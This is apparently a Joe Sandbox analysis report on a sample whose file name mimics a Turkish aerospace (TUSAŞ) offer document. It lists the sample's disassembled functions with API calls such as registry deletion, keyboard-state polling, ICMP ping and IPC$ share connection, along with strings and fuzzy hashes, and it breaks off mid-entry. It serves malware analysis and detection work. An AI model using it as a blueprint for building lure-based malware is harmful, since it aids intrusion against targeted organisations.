Opcode Fuzzy Hash: fb1ece1f6529b26449e14feb80e437a25efa45d38ca15e2b3d66a218c12e457f
Instruction Fuzzy Hash: 1D81A071514302AFDB10CF24D8C8AEB7BEAFBA8354F14051DF98597291DB70D991CBA2

Function 001EDC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 001EDC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001EDC46
_wcslen.LIBCMT ref: 001EDC50
_wcsstr.LIBVCRUNTIME ref: 001EDCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001EDCBC

Strings

04090000, xrefs: 001EDCF2
\VarFileInfo\Translation, xrefs: 001EDCB4
DefaultLangCodepage, xrefs: 001EDD1F
StringFileInfo\, xrefs: 001EDC8F
%u.%u.%u.%u, xrefs: 001EDD9A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: b4eac9969686d9e84e50602b62062596c4dde62245d4f0943ef8b13da39323ed
Instruction ID: 660b565c92ed94763a08707cd3863e09dbebf391b7fb53d66a69092241cf6d2d
Opcode Fuzzy Hash: b4eac9969686d9e84e50602b62062596c4dde62245d4f0943ef8b13da39323ed
Instruction Fuzzy Hash: F741247AA406107BDB04A7B5AC07EFF77ACEF67750F240069F900E61C2EB709A1187A5

Function 0020CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0020CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0020CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0020CD48

Part of subcall function 0020CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0020CCAA
Part of subcall function 0020CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0020CCBD
Part of subcall function 0020CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0020CCCF
Part of subcall function 0020CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0020CD05
Part of subcall function 0020CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0020CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0020CCF3

Strings

advapi32.dll, xrefs: 0020CCB8
RegDeleteKeyExW, xrefs: 0020CCC9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: a082f4c34795c102f1460a14b58897e0a2831aabe1f144b085338d82051c4adb
Instruction ID: e968816da0e5970a7c1892cff2e1ffdcd67bc59525cbbafdb3a897bbf81eeaa7
Opcode Fuzzy Hash: a082f4c34795c102f1460a14b58897e0a2831aabe1f144b085338d82051c4adb
Instruction Fuzzy Hash: C231AFB5951229BBDB208F50DC8CEFFBB7CEF15750F204265B905E2281DB308E45DAA0

Function 001EE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 001EE6B4

Part of subcall function 0019E551: timeGetTime.WINMM(?,?,001EE6D4), ref: 0019E555

Sleep.KERNEL32(0000000A), ref: 001EE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 001EE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001EE727
SetActiveWindow.USER32 ref: 001EE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001EE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 001EE773
Sleep.KERNEL32(000000FA), ref: 001EE77E
IsWindow.USER32 ref: 001EE78A
EndDialog.USER32(00000000), ref: 001EE79B

Strings

BUTTON, xrefs: 001EE719

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: be63f1a29b9479cd2bcd6290a7230f9abc3bc86409e7548a4a1095cb68b4e5eb
Instruction ID: 64e3632bd80e1c813eae80f24ab61fcbed4a6da2b3ae3fb3fddd2cbcb645304f
Opcode Fuzzy Hash: be63f1a29b9479cd2bcd6290a7230f9abc3bc86409e7548a4a1095cb68b4e5eb
Instruction Fuzzy Hash: AB21C3B4640B85FFEB005F61FC8DB693BADF76534AF204424F815C21A1DF71AC448A68

Function 001EE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001EEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001EEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001EEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001EEAA7

Strings

alias PlayMe, xrefs: 001EEA36
close PlayMe, xrefs: 001EEA6E, 001EEA9B
open , xrefs: 001EEA0C
play PlayMe wait, xrefs: 001EEA91
play PlayMe, xrefs: 001EEAA2
status PlayMe mode, xrefs: 001EEA58

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 7cb88aa0c86d1244436621bb2274c0e3d446baa8557345cdc1d3ad56c6a58d32
Instruction ID: 3b5ce5f17a4e1c52966da26f40eacff89c61fd77a03a1d6d596393bf4a08f00d
Opcode Fuzzy Hash: 7cb88aa0c86d1244436621bb2274c0e3d446baa8557345cdc1d3ad56c6a58d32
Instruction Fuzzy Hash: 28117731AA025979D724B762DC4EDFF6ABCEBD3F04F440429B811A20D1EFB00A15CAB1

Function 00198BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00198F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00198BE8,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 00198FC5

DestroyWindow.USER32(?), ref: 00198C81
KillTimer.USER32(00000000,?,?,?,?,00198BBA,00000000,?), ref: 00198D1B
DestroyAcceleratorTable.USER32(00000000), ref: 001D6973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 001D69A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00198BBA,00000000,?), ref: 001D69B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00198BBA,00000000), ref: 001D69D4
DeleteObject.GDI32(00000000), ref: 001D69E6

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7c1f59faf82249e71e880a38820433a60b1ae24d019c8a019c91ede5fdd2a920
Instruction ID: befa8346d67d8ddacb2b9afa626b9989aa3b0c6710ec1a80f0ee06f00dd8cc2b
Opcode Fuzzy Hash: 7c1f59faf82249e71e880a38820433a60b1ae24d019c8a019c91ede5fdd2a920
Instruction Fuzzy Hash: AA619C30502700DFDF299F24E95CBA9B7F1FB52316F148519E0829B6A0CB71ADA0CFA4

Function 00199838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00199944: GetWindowLongW.USER32(?,000000EB), ref: 00199952

GetSysColor.USER32(0000000F), ref: 00199862

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 170f1fbf3fc5a1745fd94361f8c7ad8588a8672630ea025740276bf7b466f3ea
Instruction ID: cf719f9ce35b8765a63e5deddaa4350b01772bf520e053c3e6cc1c675815fd77
Opcode Fuzzy Hash: 170f1fbf3fc5a1745fd94361f8c7ad8588a8672630ea025740276bf7b466f3ea
Instruction Fuzzy Hash: 4341B435544644AFDF205F3CAC88BB93BA5EB16331F24861DF9A6872E1E7319C41DB11

Function 001E96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,001CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 001E9717
LoadStringW.USER32(00000000,?,001CF7F8,00000001), ref: 001E9720

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,001CF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 001E9742
LoadStringW.USER32(00000000,?,001CF7F8,00000001), ref: 001E9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 001E9866

Strings

Error: , xrefs: 001E981D
Line %d:, xrefs: 001E97A0
Line %d (File "%s"):, xrefs: 001E978F
%s (%d) : ==> %s: %s %s, xrefs: 001E984A
^ ERROR, xrefs: 001E97FB

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 6d66ba5ee5599d196b4bca3e297258b22feb8ee15a50a2eeec887644c764a053
Instruction ID: 4b5e79026c305e2971a87ce1ce6839d368f05c7d59c042b52b34346e279df71a
Opcode Fuzzy Hash: 6d66ba5ee5599d196b4bca3e297258b22feb8ee15a50a2eeec887644c764a053
Instruction Fuzzy Hash: 9C414B72800209AACF14FBE1DD86EEEB778AF66740F640065F60572092EB356F49CF61

Function 001E06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001E07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001E07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001E07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001E0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001E082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001E0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001E083C

Strings

\CLSID, xrefs: 001E0724
\IPC$, xrefs: 001E0784
SOFTWARE\Classes\, xrefs: 001E070E

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 6e1b892bd5c933dd51dbffd0f5115435b64f2bfcbf78358b6e1ff9772a904cdb
Instruction ID: 15a7f9729c3562bc45166927940c941906b6126e117ea1bc89c9cd31ca0310d4
Opcode Fuzzy Hash: 6e1b892bd5c933dd51dbffd0f5115435b64f2bfcbf78358b6e1ff9772a904cdb
Instruction Fuzzy Hash: A5413676C10629ABDF15EBA4EC85CEDB778FF28340B144129E901B3161EB749E44CFA0

Function 00203C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00203C5C
CoInitialize.OLE32(00000000), ref: 00203C8A
CoUninitialize.OLE32 ref: 00203C94
_wcslen.LIBCMT ref: 00203D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00203DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00203ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00203F0E
CoGetObject.OLE32(?,00000000,0021FB98,?), ref: 00203F2D
SetErrorMode.KERNEL32(00000000), ref: 00203F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00203FC4
VariantClear.OLEAUT32(?), ref: 00203FD8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 8f4ffe5fd2dae168eb9782dc7c1efb95702563773216cde9e1b09929fb53a143
Instruction ID: c2e5ea61512caf79fbe7875df45b9ff355c746b20e8f112d9ff2abd6105eb12f
Opcode Fuzzy Hash: 8f4ffe5fd2dae168eb9782dc7c1efb95702563773216cde9e1b09929fb53a143
Instruction Fuzzy Hash: 6AC155716183069FD700DF68C88496BBBE9FF89744F10491DF98A9B292DB70EE05CB52

Function 001F7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001F7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001F7B8F
SHGetDesktopFolder.SHELL32(?), ref: 001F7BA3
CoCreateInstance.OLE32(0021FD08,00000000,00000001,00246E6C,?), ref: 001F7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001F7C74
CoTaskMemFree.OLE32(?,?), ref: 001F7CCC
SHBrowseForFolderW.SHELL32(?), ref: 001F7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001F7D7A
CoTaskMemFree.OLE32(00000000), ref: 001F7D81
CoTaskMemFree.OLE32(00000000), ref: 001F7DD6
CoUninitialize.OLE32 ref: 001F7DDC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 03b8e26f7ec75f32d10696317db39537dd4cf76c90943f5cac66f0c75a592b68
Instruction ID: fa9b4c49e7d4da795eb4550342d8c9e41a07e9811a7a31ea8c4012b1eeb9686d
Opcode Fuzzy Hash: 03b8e26f7ec75f32d10696317db39537dd4cf76c90943f5cac66f0c75a592b68
Instruction Fuzzy Hash: 05C11A75A04109AFCB14DFA4D888DAEBBF9FF49304B148499E919DB261DB30EE41CF90

Function 0021541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00215504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00215515
CharNextW.USER32(00000158), ref: 00215544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00215585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0021559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002155AC

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 8018819159ff5875504f0f6bb384dbe27a735483b6560b028ad9961f609aaa2c
Instruction ID: 1048a7725aeb1b61e19ceaf606c8c9fb53967d7b711f531525426eb73529fb8e
Opcode Fuzzy Hash: 8018819159ff5875504f0f6bb384dbe27a735483b6560b028ad9961f609aaa2c
Instruction Fuzzy Hash: CB619134920629EFDF109F54DC849FE7BF9FBA9320F108185F525A6290D7748AE0DBA1

Function 001DFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 001DFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 001DFB08
VariantInit.OLEAUT32(?), ref: 001DFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 001DFB3A
VariantCopy.OLEAUT32(?,?), ref: 001DFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 001DFBA1
VariantClear.OLEAUT32(?), ref: 001DFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 001DFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001DFBCC
VariantClear.OLEAUT32(?), ref: 001DFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001DFBE9

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e9d17cd37b48d3d13f52e5605651c983b7a6428cb15693df3e1d5923d1c04d0f
Instruction ID: 22b831bc777db1210af9950fda97761bc1f174f01dae11e11e9c5aa045c270fa
Opcode Fuzzy Hash: e9d17cd37b48d3d13f52e5605651c983b7a6428cb15693df3e1d5923d1c04d0f
Instruction Fuzzy Hash: B1416435A04219DFDF04DF64D8589EDBBB9FF18344F10806AE946A7361CB30AA46CF90

Function 001E9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001E9CA1
GetAsyncKeyState.USER32(000000A0), ref: 001E9D22
GetKeyState.USER32(000000A0), ref: 001E9D3D
GetAsyncKeyState.USER32(000000A1), ref: 001E9D57
GetKeyState.USER32(000000A1), ref: 001E9D6C
GetAsyncKeyState.USER32(00000011), ref: 001E9D84
GetKeyState.USER32(00000011), ref: 001E9D96
GetAsyncKeyState.USER32(00000012), ref: 001E9DAE
GetKeyState.USER32(00000012), ref: 001E9DC0
GetAsyncKeyState.USER32(0000005B), ref: 001E9DD8
GetKeyState.USER32(0000005B), ref: 001E9DEA

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: e3a0ad406a7decb722befa574dc7c805878c1e416317552a2c2f49675280d497
Instruction ID: cb8af852220900e805e56902c7d9d3ad03adaaba91364d54b1a9776e580d0587
Opcode Fuzzy Hash: e3a0ad406a7decb722befa574dc7c805878c1e416317552a2c2f49675280d497
Instruction Fuzzy Hash: 9341D634504FD969FF3496A288043FDBEE1BF21344F58805ADAC65B5C2DBA499C8C7A2

Function 0020055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002005BC
inet_addr.WSOCK32(?), ref: 0020061C
gethostbyname.WSOCK32(?), ref: 00200628
IcmpCreateFile.IPHLPAPI ref: 00200636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002006C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002006E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002007B9
WSACleanup.WSOCK32 ref: 002007BF

Strings

Ping, xrefs: 00200676

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
